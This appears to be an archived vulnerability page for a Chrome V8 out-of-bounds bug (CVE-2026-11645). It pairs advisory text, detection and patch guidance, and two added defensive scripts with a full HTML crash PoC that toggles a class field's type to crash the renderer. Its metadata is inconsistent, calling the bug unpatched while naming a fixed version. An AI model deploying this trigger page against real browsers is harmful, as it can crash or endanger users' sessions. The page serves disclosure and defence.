PoC Archive

Google Chromium V8 Out-of-Bounds Read/Write — Crash PoC (CVE-2026-11645)

by Google/Chromium (advisory); 0xBlackash (crash PoC) · 2026-07-01

CVSS: 8.8/10
Severity: High
CVE: CVE-2026-11645
Category: web
Affected product: Google Chrome / Chromium (V8 JavaScript and WebAssembly engine)
Affected versions: Chrome prior to 149.0.7827.103
Disclosed: 2026-07-01
Patch status: unpatched

Metadata

Field                  Value
Date Added             2026-07-01
Last Updated           2026-06
Author / Researcher    Google/Chromium (advisory); 0xBlackash (crash PoC)
CVE / Advisory         CVE-2026-11645
Category               web
Severity               High
CVSS Score             8.8 (CVSSv3)
Status                 Incomplete PoC (crash only; no confirmed public RCE chain)
Tags                   browser, chrome, v8, javascript, turbofan, out-of-bounds, memory-corruption, zero-day, incomplete-poc, active-exploitation
Related                N/A

Affected Target

Field                     Value
Software / System         Google Chrome / Chromium (V8 JavaScript and WebAssembly engine)
Versions Affected         Chrome prior to 149.0.7827.103
Language / Platform       HTML/JavaScript
Authentication Required   No
Network Access Required   No (local file); real-world delivery would be via a crafted web page

Summary

CVE-2026-11645 is a high-severity out-of-bounds read/write vulnerability in V8, the JavaScript and WebAssembly engine used by Chrome and other Chromium-based browsers. The bug is in TurboFan, V8's optimizing compiler: incorrect range analysis for values modified in loops or by bitwise operations can lead the compiler to eliminate runtime bounds checks on array accesses that it should have kept, and a related trigger involves stale ElementsKind assumptions after an array's backing-store layout transitions. Google has confirmed in-the-wild exploitation but has not published root-cause details, and no fully weaponized public RCE PoC has been found. The repository archived here is a browser-crash / instability demonstrator only: it reports the Chrome major version it detects and repeatedly instantiates a class whose field initializer switches from an integer to a floating-point value, a pattern intended to induce V8 memory corruption. It contains no sandbox-escape or code-execution chain.


Vulnerability Details

Root Cause

TurboFan’s range analysis for loop-modified/bitwise-manipulated values can incorrectly eliminate bounds checks on typed/regular array accesses, and stale ElementsKind assumptions after an array’s backing-store layout transitions can compound the issue, producing out-of-bounds reads/writes in JIT-compiled code.

Attack Vector (as publicly understood — not fully reproduced by this PoC)

  1. Victim loads a crafted web page in a vulnerable Chrome build.
  2. JavaScript on the page trains TurboFan via repeated execution to JIT-optimize a function with the vulnerable range-analysis pattern.
  3. A subsequent call with attacker-controlled values causes the JIT to skip a bounds check, corrupting adjacent heap memory.
  4. Full exploitation would require further primitives (addr-of/fake-obj, sandbox escape) not present in this PoC.
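The following is an added example, not code from the 0xBlackash repository or from Chromium. It is a generic harness for the bug class described in the Summary, Root Cause and the steps above (bounds-check elimination after JIT warm-up), written to make "training" and "skipped bounds check" concrete. It does not reproduce CVE-2026-11645: the real trigger is undisclosed, so the loop-modified, bitwise-masked index shape is an assumed stand-in that merely gives TurboFan's range analysis something to reason about. On a correctly behaving engine every check in it passes; the point is to show what a practitioner verifies, namely that an out-of-bounds index still yields `undefined` after warm-up.

```javascript
// Added example (not part of the archived PoC). Generic harness for the
// "bounds-check elimination after JIT training" bug class. It does NOT
// reproduce CVE-2026-11645; the index shape below is an assumed stand-in.
'use strict';

// Constructed sample input: a 32-element array with recognisable contents.
function makeArray(len) {
  return Array.from({ length: len }, (_, i) => i * 3);
}

// The access under test. idx is loop-modified and bitwise-masked, so the
// compiler can prove idx lies in [0, 255], but it must still bounds-check
// arr[idx] against arr.length, which it cannot know statically.
function readAt(arr, n) {
  let idx = 0;
  for (let i = 0; i < n; i++) {
    idx = (idx + 7) & 0xff;
  }
  return arr[idx];
}

// Step 2 of the attack vector: "training". readAt is called many times with
// arguments that keep idx in bounds (n in 0..3 gives idx in {0, 7, 14, 21}),
// so the function is optimized with only in-bounds feedback.
function train(arr, rounds) {
  let acc = 0;
  for (let r = 0; r < rounds; r++) {
    acc += readAt(arr, r % 4);
  }
  return acc;
}

// Step 3 stand-in: after training, call with a value that drives idx past
// the end (n = 5 gives idx = 35 for a 32-element array). A sound engine
// keeps the bounds check and returns undefined; a JIT that had wrongly
// eliminated it would read past the backing store instead.
function verifyBoundsChecks() {
  const arr = makeArray(32);
  train(arr, 5000);
  const inBounds = readAt(arr, 3);    // arr[21], which is 63
  const outOfBounds = readAt(arr, 5); // arr[35], past the end
  return {
    inBounds,
    outOfBounds,
    boundsHeld: inBounds === 63 && outOfBounds === undefined,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(verifyBoundsChecks());
}
```

Run it under Node or in a page; `boundsHeld` must be `true` on any engine without a bounds-check-elimination bug. The same harness shape, with the real trigger function substituted, is how a crash PoC like the one archived here would be turned into a controlled out-of-bounds read, which is precisely what this archive does not contain.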

Impact

Confirmed in-the-wild exploitation per Google, believed to enable code execution inside the browser sandbox. This archived PoC demonstrates browser instability/crash only.


Environment / Lab Setup

Target:   Google Chrome < 149.0.7827.103
Attacker: Any HTTP server or local file:// delivery of CVE-2026-11645.html

Proof of Concept

PoC File

See CVE-2026-11645.html in this folder.

Open the HTML file in a vulnerable Chrome build. The page has a version-check button and trigger buttons. The version check compares only the major version from navigator.userAgent, so it cannot distinguish 149.0.7827.102 from the fixed 149.0.7827.103 and treats any 149+ build as patched. The trigger routine constructs a class that extends Function and has a class field initialized from a closure variable; it instantiates the class 800 times with the variable set to the integer 2, then 1500 more times with it set to 1.1, so the field's stored representation changes from a small integer to a double mid-run. The intent is to induce the TurboFan range-analysis bug and crash the renderer. The "strong" button repeats the routine 5 times and the "auto" button schedules that 8 times at 700 ms intervals.

This PoC demonstrates instability/crash behavior only — it is not a working code-execution exploit.


Detection & Indicators of Compromise

Signs of compromise (none is specific to this CVE; renderer crashes in JIT-compiled code have many causes):

  • Chrome crash reports with V8/TurboFan frames (v8::internal::compiler) in the stack trace, particularly after visiting an untrusted page
  • Endpoint EDR alerts for renderer-process anomalies (unexpected child processes, crashes followed by suspicious activity) following web browsing

Remediation

Action        Detail
Primary fix   Update Chrome to 149.0.7827.103 or later
Mitigation    Enable/verify auto-update; consider Site Isolation (the SitePerProcess policy) and sandboxing hardening in managed environments
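The PoC's own version check compares only the major version, which cannot express the fix threshold this page gives. The following is an added example, not code from the 0xBlackash repository: a full four-part comparison against 149.0.7827.103, plus a User-Agent classifier that reports "indeterminate" rather than guessing when the reduced UA string (which Chrome reports as `Chrome/<major>.0.0.0`) hides the build and patch numbers.

```javascript
// Added example (not part of the archived PoC). Compares a Chrome build
// against the first fixed version stated on this page.
'use strict';

// First fixed build, as given in the affected-versions field above.
const FIXED_VERSION = '149.0.7827.103';

// Parse "a.b.c.d" into four integers, or return null for anything else.
function parseVersion(s) {
  const m = /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/.exec(String(s).trim());
  return m ? m.slice(1, 5).map(Number) : null;
}

// Lexicographic comparison of two parsed versions: -1, 0 or 1.
function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// true when the build is at or above FIXED_VERSION.
function isFixedBuild(versionString) {
  const v = parseVersion(versionString);
  if (!v) {
    throw new TypeError('expected a four-part Chrome version, got ' + versionString);
  }
  return compareVersions(v, parseVersion(FIXED_VERSION)) >= 0;
}

// Classify a User-Agent string. Since Chrome's UA reduction the UA reports
// build and patch as 0 ("Chrome/149.0.0.0"), so for the fix major the UA
// alone cannot tell .102 from .103. Report that honestly; the full version
// is available in Chromium from
// navigator.userAgentData.getHighEntropyValues(['fullVersionList']).
function classifyUserAgent(ua) {
  const m = /Chrome\/(\d+\.\d+\.\d+\.\d+)/.exec(ua);
  if (!m) return 'not-chrome';
  const v = parseVersion(m[1]);
  const fixed = parseVersion(FIXED_VERSION);
  if (v[0] > fixed[0]) return 'patched';
  if (v[0] < fixed[0]) return 'vulnerable';
  if (v[2] === 0 && v[3] === 0) return 'indeterminate'; // reduced UA string
  return isFixedBuild(m[1]) ? 'patched' : 'vulnerable';
}
```

In a managed fleet the authoritative source is the installed binary version reported by the management agent, not the UA string; the classifier above is for triage of proxy or web-server logs, where the reduced UA is all you have.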


Notes

Auto-ingested from https://github.com/0xBlackash/CVE-2026-11645 on 2026-07-01. Caution: Google has not disclosed root-cause exploitation details for this actively-exploited bug, and this is the only public repository found for the CVE. It is a crash/instability demonstrator, not a validated weaponized exploit — treat any claims of a full sandbox-escape/RCE PoC for this CVE with skepticism until corroborated by a named security researcher or vendor writeup.

cve-2026-11645.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-11645 Test PoC - Chrome 148</title>
    <style>
        body {
            font-family: monospace;
            background: #0f0f1a;
            color: #00ff00;
            padding: 20px;
            margin: 0;
        }
        h1 { color: #ff4444; }
        button {
            padding: 15px 25px;
            font-size: 18px;
            margin: 10px;
            cursor: pointer;
            background: #e94560;
            color: white;
            border: none;
            border-radius: 6px;
        }
        button:hover { background: #ff6b6b; }
        #log {
            background: #1a1a2a;
            padding: 20px;
            margin-top: 20px;
            white-space: pre-wrap;
            max-height: 80vh;
            overflow-y: auto;
            border: 1px solid #333;
            font-size: 15px;
        }
        .info { color: #00ccff; }
        .success { color: #00ff88; }
        .warning { color: #ffaa00; }
    </style>
</head>
<body>
    <h1>CVE-2026-11645 - V8 OOB Test PoC</h1>
    <p><strong>Target:</strong> Chrome 148 (Vulnerable)</p>
    <p>Click "Run Auto Stress Test" for best results.</p>

    <button onclick="checkVersion()">🔍 Check Version</button>
    <button onclick="runStrongTest()">🚀 Trigger Strong Test (5x)</button>
    <button onclick="runAutoTest()">🔄 Run Auto Stress Test (Recommended)</button>
    <button onclick="clearLog()">Clear Log</button>

    <div id="log"></div>

    <script>
        const logEl = document.getElementById('log');

        function log(msg, type = 'info') {
            const ts = new Date().toLocaleTimeString();
            let prefix = '';
            if (type === 'success') prefix = '✅ ';
            else if (type === 'warning') prefix = '⚠️ ';
            else if (type === 'error') prefix = '❌ ';
            
            const line = `[${ts}] ${prefix}${msg}\n`;
            logEl.textContent += line;
            console.log(msg);
            logEl.scrollTop = logEl.scrollHeight;
        }

        // Reads only the major version from navigator.userAgent. Modern Chrome
        // reports a reduced UA ("Chrome/149.0.0.0"), so this cannot tell
        // 149.0.7827.102 from the fixed 149.0.7827.103; it is a coarse hint only.
        function checkVersion() {
            const ua = navigator.userAgent;
            const match = ua.match(/Chrome\/(\d+)/);
            if (match) {
                const ver = parseInt(match[1], 10);
                log(`Browser: ${match[0]}`, 'info');
                if (ver < 149) {
                    log("⚠️ LIKELY VULNERABLE (before 149.0.7827.103)", 'warning');
                } else {
                    log("✅ Major version 149+ detected; confirm the full build is 149.0.7827.103 or later", 'success');
                }
            } else {
                log("Could not detect Chrome version", 'error');
            }
        }

        // Builds a class (extending Function) whose class field initializer
        // reads `value` from the enclosing scope at every construction. The
        // first loop stores the small integer 2 into the field; the second
        // switches to the double 1.1, so the field's representation changes
        // mid-run. The pattern is intended to provoke the TurboFan bug and
        // crash the renderer; it is not a controlled OOB primitive.
        function trigger() {
            try {
                let value = 2;
                class C extends Function {
                    ['AA'] = value;
                }
                // Training phase: 800 constructions with an integer field value
                for (let i = 0; i < 800; i++) {
                    new C("'use strict'");
                }
                // Type change: 1500 constructions with a double field value
                value = 1.1;
                for (let i = 0; i < 1500; i++) {
                    new C("'use strict'");
                }
            } catch (e) {
                log("Trigger error: " + e.message, 'error');
            }
        }

        function runStrongTest() {
            log("=== Starting Strong Trigger (5 runs) ===", 'warning');
            for (let run = 0; run < 5; run++) {
                trigger();
                log(`Strong trigger run ${run + 1}/5 completed`, 'success');
            }
            log("=== Strong test finished - Check if tab crashed ===", 'info');
        }

        function runAutoTest() {
            log("=== AUTO STRESS TEST STARTED (8 cycles) ===", 'warning');
            let count = 0;
            const interval = setInterval(() => {
                count++;
                runStrongTest();
                if (count >= 8) {
                    clearInterval(interval);
                    log("Auto stress test completed.", 'info');
                }
            }, 700);
        }

        function clearLog() {
            logEl.textContent = '';
            log("Log cleared.", 'info');
        }

        // Auto start
        window.onload = function() {
            checkVersion();
            log("✅ CVE-2026-11645 Test PoC Ready", 'success');
            log("Tip: Use 'Run Auto Stress Test' for maximum chance of triggering crash on vulnerable Chrome 148", 'info');
        };
    </script>
</body>
</html>